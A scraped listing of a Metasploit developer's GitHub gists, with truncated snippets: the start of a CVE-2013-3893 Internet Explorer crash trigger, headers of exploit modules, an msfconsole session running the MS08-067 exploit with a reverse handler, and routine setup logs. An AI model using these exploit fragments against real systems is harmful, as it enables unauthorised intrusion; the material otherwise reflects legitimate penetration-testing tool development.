sinn3r wchen-r7
wchen-r7
/ cve_2013_3893_trigger.html
Created
September 30, 2013 01:11
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <html> | |
| <script> | |
| function trigger() | |
| { | |
| var id_0 = document.createElement("sup"); | |
| var id_1 = document.createElement("audio"); | |
| document.body.appendChild(id_0); | |
| document.body.appendChild(id_1); | |
| id_1.applyElement(id_0); |
wchen-r7
/ gist:6774619
Created
October 1, 2013 06:37
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| require 'msf/core' | |
| class Metasploit3 < Msf::Exploit::Remote | |
| Rank = NormalRanking | |
| include Msf::Exploit::Remote::HttpServer::HTML | |
| include Msf::Exploit::RopDb | |
| def initialize(info={}) | |
| super(update_info(info, |
wchen-r7
/ gist:7047590
Created
October 18, 2013 20:16
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| require 'msf/core' | |
| class Metasploit3 < Msf::Exploit::Remote | |
| Rank = NormalRanking | |
| include Msf::Exploit::Remote::HttpServer::HTML | |
| def initialize(info={}) | |
| super(update_info(info, | |
| 'Name' => "IE test", |
wchen-r7
/ gist:858b90913ca49019099d
Created
February 2, 2015 20:31
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| msf > irb | |
| [*] Starting IRB shell... | |
| >> require 'method_source' | |
| => true | |
| >> framework.db.method(:import_ip_list_file).source_location | |
| => ["/Users/sinn3r/rapid7/msf/lib/msf/core/db_manager/import/ip_list.rb", 18] | |
| >> framework.db.method(:import_ip_list_file).parameters | |
| => [[:opt, :args]] | |
| >> puts framework.db.method(:import_ip_list_file).source |
wchen-r7
/ ms08_067_netapi_demo.txt
Created
February 11, 2015 04:45
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $ ./msfconsole -q | |
| msf > use exploit/windows/smb/ms08_067_netapi | |
| msf exploit(ms08_067_netapi) > set rhost 192.168.1.80 | |
| rhost => 192.168.1.80 | |
| msf exploit(ms08_067_netapi) > check | |
| [+] 192.168.1.80:445 - The target is vulnerable. | |
| msf exploit(ms08_067_netapi) > run | |
| [*] Started reverse handler on 192.168.1.64:4444 | |
| [*] Automatically detecting the target... |
wchen-r7
/ sounds_template.rb
Created
February 11, 2015 20:16
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # | |
| # $Id$ | |
| # $Revision$ | |
| # | |
| module Msf | |
| ### | |
| # | |
| # This class hooks all session creation events and plays a sound |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ## | |
| # This module requires Metasploit: http://metasploit.com/download | |
| # Current source: https://github.com/rapid7/metasploit-framework | |
| ## | |
| require 'msf/core' | |
| class Metasploit3 < Msf::Exploit::Remote | |
| Rank = NormalRanking |
wchen-r7
/ gist:d65dfb5e02f9300fce00
Created
February 24, 2015 18:13
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| sinn3r $ cd ~/rapid7/msf | |
| sinn3r $ bundle install | |
| Resolving dependencies... | |
| Using rake 10.4.2 | |
| Using i18n 0.6.11 | |
| Using multi_json 1.0.4 | |
| Using activesupport 3.2.21 | |
| Using builder 3.0.4 | |
| Using activemodel 3.2.21 | |
| Using erubis 2.7.0 |
wchen-r7
/ gist:078fe52118de84a4ad7b
Created
February 24, 2015 18:14
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| sinn3r$ rvm use ruby-1.9.3-p448 | |
| Using /Users/sinn3r/.rvm/gems/ruby-1.9.3-p448 | |
| sinn3r$ ./msfpayload -h | |
| [!] ************************************************************************ | |
| [!] * The utility msfpayload is deprecated! * | |
| [!] * It will be removed on or about 2015-06-08 * | |
| [!] * Please use msfvenom instead * | |
| [!] * Details: https://github.com/rapid7/metasploit-framework/pull/4333 * | |
| [!] ************************************************************************ | |
| Could not find rake-10.4.2 in any of the sources |
wchen-r7
/ gist:efcb46224b7a8320186c
Created
February 24, 2015 22:22
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| sudo apt-get -y install \ | |
| build-essential zlib1g zlib1g-dev \ | |
| libxml2 libxml2-dev libxslt-dev locate \ | |
| libreadline6-dev libcurl4-openssl-dev git-core \ | |
| libssl-dev libyaml-dev openssl autoconf libtool \ | |
| ncurses-dev bison curl wget postgresql \ | |
| postgresql-contrib libpq-dev \ | |
| libapr1 libaprutil1 libsvn1 \ | |
| libpcap-dev libsqlite3-dev |
OlderNewer